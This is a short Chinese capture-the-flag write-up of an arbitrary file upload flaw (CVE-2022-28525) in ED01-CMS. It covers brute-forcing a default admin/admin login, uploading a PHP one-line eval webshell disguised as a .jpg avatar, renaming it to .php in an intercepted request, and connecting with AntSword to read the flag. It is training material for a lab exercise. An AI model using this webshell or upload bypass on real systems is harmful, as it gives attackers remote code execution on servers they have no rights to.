春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

复制代码
1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
Cx330❀9 分钟前
【数据结构初阶】--单链表(二)
数据结构·经验分享·算法·leetcode
(天津)鸿萌数据安全1 小时前
数字取证和网络安全:了解两者的交叉点和重要性
网络安全·数据取证
NewCarRen1 小时前
符合网络安全的汽车OTA软件更新分发机制
安全·web安全·汽车
白帽程序员猫哥2 小时前
漏洞全讲解之中间件与框架漏洞(数字基础设施的“阿喀琉斯之踵“)
网络·安全·web安全·中间件·密码学·渗透
AOwhisky2 小时前
云计算一阶段Ⅱ——12. SELinux 加固 Linux 安全
linux·安全·云计算
大不点wow3 小时前
加密流量论文复现:《Detecting DNS over HTTPS based data exfiltration》(上)
机器学习·网络安全·sklearn
LH_R3 小时前
OneTerm 开源堡垒机 | 历时三个月重构大更新
运维·后端·安全
我科绝伦(Huanhuan Zhou)4 小时前
DM数据库的安全版本SYSDBA无法修改其他用户密码?
数据库·安全
努力的小雨4 小时前
国内免费CDN,就问你要不要薅羊毛?
经验分享
草莓熊Lotso4 小时前
【数据结构初阶】--排序(四):归并排序
c语言·数据结构·经验分享·其他·算法·排序算法